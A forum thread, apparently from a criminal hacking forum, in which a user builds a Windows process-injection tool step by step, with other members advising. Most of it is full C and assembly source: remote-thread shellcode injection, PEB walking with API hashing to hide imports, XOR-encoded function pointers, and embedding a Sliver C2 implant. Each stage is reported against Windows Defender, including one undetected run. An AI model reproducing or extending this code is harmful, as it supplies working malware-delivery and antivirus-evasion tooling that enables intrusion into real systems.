• XSS.stack #1 – первый литературный журнал от юзеров форума

Evolving from basic

el84

(L2) cache
Пользователь
Регистрация
10.01.2023
Сообщения
326
Реакции
143
Депозит
0.00
Hello, in this thread I will start a new project where my plan is to begin with a very simple code and improve it along the time using my free time. As you all will notice this first version of the code have nothing fancy and it is the purpose that it start from the most basic thread(shellcode) injector. So for this starting point I choose the following requirements .

The program should receive a single parameter which is the Process ID of the target process to inject the shellcode and to just use C standard library and WinAPI. For this first version there is no much to talk about, I used the atoi() function to convert the parameter(process id) from C string to integer and then a sequence of calls to WinAPI to reach the goal. The name of the functions from WinAPI are self explanatory but I'm also adding the links to documentation just in case.

The payload included with the program is just a "NOP NOP NOP RET" in x86_64 is useful in this context to test if the injector is working, the target process should keep running fine and the injector itself should end returning 0.

Implementation:
C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

int main(int argc, char** argv)
{
    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcess(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
   
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocEx(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemory(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThread(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

This simple program which don't even inject malicious code yet is already flagged as defense evasion by defender as can be seen on the following image, so in the next post I should change the code to just works without triggering defender:


Observation for mods: I will keep a similar thread on XSS, Ramp and Exp, just warn me if its should not be done here.

References:
 

Вложения

  • flagged_def_evasion.png
    flagged_def_evasion.png
    21.9 КБ · Просмотры: 52
Последнее редактирование:
Hello again, as a first improvement I want to implement the technique know as API Hashing, which consist in locating the functions from modules (eg: ntdll.dll) using the hash of the name of module and function. The first step on doing this is to first locate the structs to traverse all loaded modules the way to do this is start by getting PEB address which has the member Ldr described as:

A pointer to a PEB_LDR_DATA structure that contains information about the loaded modules for the process.

I used to use inline-asm to get PEB reference, but in this project I choose to use Visual Studio (just x86-64) and it don't allow __asm directives anymore, so I though if WinAPI have ready made functions useful for this case. With a quick search I found GetPebAddress() which do exactly what is needed but it give me linking errors when I tried to use, this can be fixed but will introduce a dependency in our code which is a bad approach for any kind of malware. Searching a bit more I see that some people recommend to use NtQueryInformationProcess() to query the "ProcessBasicInformation" which contains the PEB address, it will work but still not useful for our purpose, as stateded in the documentation:

This function has no associated import library. You must use the LoadLibrary and GetProcAddress functions to dynamically link to Ntdll.dll.

Using LoadLibrary and GetProcAddress will be a red flag in almost all EDRs, therefore I get back on the original plan, I know that PEB address is stored at offset 0x60 in from a base stored in GS register, since I cant use inline I needed to learn how to include asm into a C/C++ using Visual Studio. I found this tutorial Adding x86, x64 Assembly Language code to the Visual Studio C++ which is very straight. I will not repeat the steps from tutorial here since its very easy to follow.

After enabling masm in the project I did the same thing I would do using __asm direct, I added a new file called peb.asm in the project and implemented a single function to retrieve the PEB address, here is the code:
Код:
.CODE

get_peb PROC
    mov rax, gs:[60h]
    ret
get_peb ENDP

END

Then in the previous code for the thread injector we need to declare the function, this can be done in the following way:

C:
extern PEB * get_peb();

Finally to test if its all going as expected, I just used the implemented function and printed the return in stardard output, also ran the code the debugger x64dbg to compare the PEB address returned from our function and the command peb() from the debugg.


C:
int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    printf("PEB @ %p\n", ppeb);

Here is the output from the program and x64dbg showing the same value for peb():
PEB_correct.png


This finishes this post, I know the API hashing is not implemented but we moved a bit into the path to implement it and also acquired the skill to use ASM in our project whenever its needed. Feel free to ask questions.
 
I walked a bit more, I still not implemented the API Hashing but improved the code to traverse the loaded modules and functions names searching for the function by name. For this a created a new function which receive the PEB address and function name to seek for. There is some details on how to traverse the modules but I think the code speaks for it self:

Here is the implementation:
C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
#include <winternl.h>

extern PEB * get_peb();

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

void* get_proc(PEB* ppeb, char* proc_name)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
            //printf("mod_name = %s\n", module_name);

            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
            
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
            
                if (strcmp(func_name, proc_name) == 0) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}

HANDLE (*OpenProcessPtr)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
);

LPVOID (*VirtualAllocExPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

BOOL (*WriteProcessMemoryPtr)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
);

HANDLE (*CreateRemoteThreadPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
);

int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    OpenProcessPtr = get_proc(ppeb, "OpenProcess");
    VirtualAllocExPtr = get_proc(ppeb, "VirtualAllocEx");
    WriteProcessMemoryPtr = get_proc(ppeb, "WriteProcessMemory");
    CreateRemoteThreadPtr = get_proc(ppeb, "CreateRemoteThread");

    printf("OpenProcessPtr @ %p\n", OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", CreateRemoteThreadPtr);

    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcessPtr(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
    
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocExPtr(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemoryPtr(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThreadPtr(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

A curious thing, is that even this version is using C Strings to search for the functions which our thread injections needs, it seems to be enough to fool Windows Defender, I injected our "useless" code into a fresh notepad.exe process as a test and had 0 detection:

bypass_defender.png


To make get_proc() works as real API Hashing we should change the second parameter from C String to integer(hash value) and change from strcmp test to equality comparison with the hash value, it must be very straight. The next step is to do this and then try to use the injector with know malicious code.

Some references:
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I used to use inline-asm to get PEB reference, but in this project I choose to use Visual Studio (just x86-64) and it don't allow __asm directives anymore, so I though if WinAPI have ready made functions useful for this case
In case of getting PEB there are intrinsic functions that can be used, like __readgsqword on x64 or __readfsdrword on x86: https://learn.microsoft.com/ru-ru/c...dgsdword-readgsqword-readgsword?view=msvc-170 (intrinsics are not functions per se, basically it is small inline asm code).
 
In case of getting PEB there are intrinsic functions that can be used, like __readgsqword on x64 or __readfsdrword on x86: https://learn.microsoft.com/ru-ru/c...dgsdword-readgsqword-readgsword?view=msvc-170 (intrinsics are not functions per se, basically it is small inline asm code).
Thanks for the input I used some intrinsic in GCC in the past but I don't even remember that this think exist and I never was aware about the __readgsqword. I will change the code to use it in the next changes, I think it will be better to make this project in a single .c file at least for now.
 
Here is an update on code, I think we can call it an API hashing even that my implementation of hash is very naive. First of all I created a separated program to compute the hash and output it as defines, the idea is to generate a header hash.h to use in our implementation to make lookup easy. The implementation is very straight here is code:

C:
#include <stdio.h>
#include <stdint.h>

uint64_t hash(char *str)
{
    uint64_t ret = 1;
    unsigned char c;
    
    for (int i = 1337; (c = *str++); i+=c) {
        ret += c * i;       
    }

    return ret;
}

struct ftable {
    char* mod;
    char* fname;
} table[] = {
    {"KERNEL32.dll", "OpenProcess"},
    {"KERNEL32.dll", "VirtualAllocEx"},
    {"KERNEL32.dll", "WriteProcessMemory"},
    {"KERNEL32.dll", "CreateRemoteThread"}
};

int main(int argc, char** argv)
{
    for (int i = 0; i < sizeof(table) / sizeof(struct ftable); i++) {
        printf("#define %s_HASH\t\t0x%llx\n",
            table[i].fname, hash(table[i].mod) + hash(table[i].fname) );
    }
}

The output of this code is as follows:
Код:
#define OpenProcess_HASH                0x3888ae
#define VirtualAllocEx_HASH             0x43bb4c
#define WriteProcessMemory_HASH         0x58b55b
#define CreateRemoteThread_HASH         0x552ca9

As you can see I used the sum of the hashes of module name and function name, so this is how we need to lookup in our previous get_proc() function, I updated the code for this and also changed the get_peb() function to use intrinsic __readgsqword (greetz to DildoFagins ), so here is the new implementation:

C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
#include <stdint.h>
#include <winternl.h>
#include "hash.h"

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

uint64_t hash(char* str)
{
    uint64_t ret = 1;
    unsigned char c;

    for (int i = 1337; (c = *str++); i += c) {
        ret += c * i;
    }

    return ret;
}

PEB* get_peb()
{
    return (PEB*)__readgsqword(0x60);
}

void* get_proc(PEB* ppeb, uint64_t func_hash)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
            
            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
            
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
            
                if (hash(module_name)+hash(func_name) == func_hash) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}

HANDLE (*OpenProcessPtr)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
);

LPVOID (*VirtualAllocExPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

BOOL (*WriteProcessMemoryPtr)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
);

HANDLE (*CreateRemoteThreadPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
);

int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    OpenProcessPtr = get_proc(ppeb, OpenProcess_HASH);
    VirtualAllocExPtr = get_proc(ppeb, VirtualAllocEx_HASH);
    WriteProcessMemoryPtr = get_proc(ppeb, WriteProcessMemory_HASH);
    CreateRemoteThreadPtr = get_proc(ppeb, CreateRemoteThread_HASH);

    printf("OpenProcessPtr @ %p\n", OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", CreateRemoteThreadPtr);

    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcessPtr(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
    
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocExPtr(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemoryPtr(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThreadPtr(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

I just tested the code as is and it injected into a fresh notepad process without any problems, now we have a basic injector but it still not very useful since its just injecting a few bytes for testing purposes.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I think we can call it an API hashing even that my implementation of hash is very naive
Hash collisions while getting API pointers can be dreadfull for your malware. Basically if you find a pointer to another function because of hash collision (not the function you was looking for) the call would most likely crash your process. Maybe you could catch it with VEH and somehow recover from it in a proper way, but I'd rather be using a better hash function instead. As far as I remember Murmur is pretty good on Latin1 character set in terms of collision propability, you can also try out DJB2, FNV or Jenkins, which are pretty simple while having somewhat good (small) collision propability.
 
Hash collisions while getting API pointers can be dreadfull for your malware. Basically if you find a pointer to another function because of hash collision (not the function you was looking for) the call would most likely crash your process. Maybe you could catch it with VEH and somehow recover from it in a proper way, but I'd rather be using a better hash function instead. As far as I remember Murmur is pretty good on Latin1 character set in terms of collision propability, you can also try out DJB2, FNV or Jenkins, which are pretty simple while having somewhat good (small) collision propability.
I looked for some implementations before rolling this "shitty" function myself, I wonder if EDRs and some static analysis don't auto detect some implementations actually, but you are right. I don't even tested my hash function for collisions with a big dataset. I think it will be a nice test to verify how hard is to produce a collision (using valid dlls and function names) with this too naive approach.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I wonder if EDRs and some static analysis don't auto detect some implementations actually
You wouldn't add static detections soly on the public and well known algorithm that can be used in million different codebases, would you?
 
You wouldn't add static detections soly on the public and well known algorithm that can be used in million different codebases, would you?
Yep it cant add flag, it will create a shitload of false positives in a lot of software even DBs, I was looking about how can I evaluate my naive function but it seems true hard. Its a giant matter which have great challanges. I also take a look on some implementations. I think I will stick with djb2 from here http://www.cse.yorku.ca/~oz/hash.html
 
Hi everyone, I made new changes on this code, the first one is to use a well know hash function(djb2) instead my naive implementation. I implemented a basic technique to encode the WinAPI function pointers instead of just storing them, the motivation is that a memory scan will find out a function table with values pointing to WinAPI very easily.

To implement this technique I introduced a new structure which will hold a 64bit random value used to encode the function pointer with XOR, and a field for every encoded pointer to be stored, as follows:

C:
struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

To initialize the struct I introduced the function init_table() which create the random 64bit value, and then use this values to encode pointers returned by get_proc() and finally store each pointer in the struct:


C:
void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
   
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

From this point on, we have almost all that is needed to use the WinAPI, but for the sake of usability I also introduced a convoluted macro FCALL, which receive the name of a variable of type struct func_ptrs, name of field (function pointer), and finally the parameters to the WinAPI function, it will expand to the necessary code to decode the function pointer, cast it to the correct type and call the respective function:

C:
#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

Even that the macro code seems strange because the usage of _Generic and variadic-args, the usage is very easy, here is a example of call to OpenProcess():


C:
    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );

I did not included the typedefs before but here is the entire implementation if someone want to reuse something:


C:
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <winternl.h>
#include <time.h>


#include "hash.h"

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

// djb2 from http://www.cse.yorku.ca/~oz/hash.html
unsigned long hash(unsigned char* str)
{
    unsigned long hash = 5381;
    int c;

    while (c = *str++)
        hash = ((hash << 5) + hash) + c; /* hash * 33 + c */

    return hash;
}

PEB* get_peb()
{
    return (PEB*)__readgsqword(0x60);
}

void* get_proc(PEB* ppeb, uint64_t func_hash)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
           
            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
           
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
           
                if (hash(module_name)+hash(func_name) == func_hash) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}


typedef HANDLE(*OpenProcessPtr_t)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
    );
typedef     LPVOID(*VirtualAllocExPtr_t)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
    );
typedef BOOL(*WriteProcessMemoryPtr_t)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
    );
typedef     HANDLE(*CreateRemoteThreadPtr_t)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
    );

struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
   
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.##fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

int main(int argc, char** argv)
{
    struct func_ptrs fptrs;
    init_table(&fptrs);
   
    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );
   
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }
   
    printf("proc_handle = %p", proc_handle);
   
    remote_mem = FCALL(fptrs, VirtualAllocExPtr,
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    FCALL(fptrs, WriteProcessMemoryPtr,
        proc_handle, remote_mem, payload, sizeof(payload), &written
    );

    remote_thread_handle =
        FCALL(fptrs, CreateRemoteThreadPtr,
            proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL
        );

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }
   
    return 0;
}

It worked fine in my tests, all functions are returning as expected, next step will be to use well know malicous code which will be detected at first and then make the needed changes to make it evade again.
 
Последнее редактирование:
As I said before the plan now is to include malicious payload and as an example my choice is to use Sliver http implant since sliver can generate shellcode for this kind of implant. I generate the payload as follows:

_sliver_gen.png


The main problem is that the payload have 17M, even being possible to use xxd -i to create an include file(eg: payload.h) it will cause problems and a ridiculous usage of RAM during build time because compiler will be parsing a string of 17M as a single token. To include the payload together with our injector we have a lot of options and a used to use the INCBIN macro which is very simple, even being an external dependency(a single .h) I think its useful and easy enough to be worth in the project.

Some problems appeared because of my choice, the first one is that MSVC compiler lacking inline asm make the implementation of INCBIN more tricky, they explain this in the README of project, since I dont want the project to become complex, I moved from MSVC to x86_64-w64-mingw32-gcc, I don't needed to change much things to make it compile fine, for real the unique change was to change include <Windows.h> to include <windows.h>. Then I just tried to use the code as before. I recompiled gen_hdr.c with gcc for my own system (Linux x64) used it to create the hash.h and finally compiled program.c using mingw.

The program do not worked as expected, after looking for the code again I noticed that the only possible case is a difference of hash function being compiled under gcc for linux x64 and mingw, and it turns out that is was the problem because the hash function was using unsigned long, which have 64-bit on gcc for linux x64 and have 32-bit in the minw for Windows x64. This thing happens because there is some kind of systems which followed different approachs when extening bitness to include 64-bit, Linux x64 is LP64 and Windows x64 is LLP64. Here is a table which summarize the differences:

_LP64.png


I could be using better types as defined in stdint.h like uint64_t, which will work as expected across any OS/Arch, but as a quick fix I just changed the hash function to use unsigned long long type, so both systems will be working with 64-bit as expected. I will provide a reference on those LP64 as the end. THe good thing as that after this change the code worked as expected and then I put the win_http_shellcode file in the project path and changed program.c as follows:
C:
#define INCBIN_PREFIX
#define INCBIN_STYLE INCBIN_STYLE_SNAKE
#include "incbin.h"

INCBIN(payload, "win_http_shellcode");
//...same as before...
        remote_mem = FCALL(fptrs, VirtualAllocExPtr,
                proc_handle, NULL, payload_size, MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE
        );
//...same as before...
        FCALL(fptrs, WriteProcessMemoryPtr,
                proc_handle, remote_mem, payload_data, payload_size, &written
        );

As you can see, the usage of INCBIN is very easy, you just need to choose a variable name and the path to a file which will be included, then you will have 2 variables in my case payload_data and payload_size, first one points to the begin of included file and the other have the size of include file. As a quick test, I spawned a notepad.exe and run the code from a exclusion directory, the injection was correct as the session was created in C2, but after few seconds defender shows a detection and killed notepad.exe (probably dynamic analys catch sliver):

_sliver_detection.png


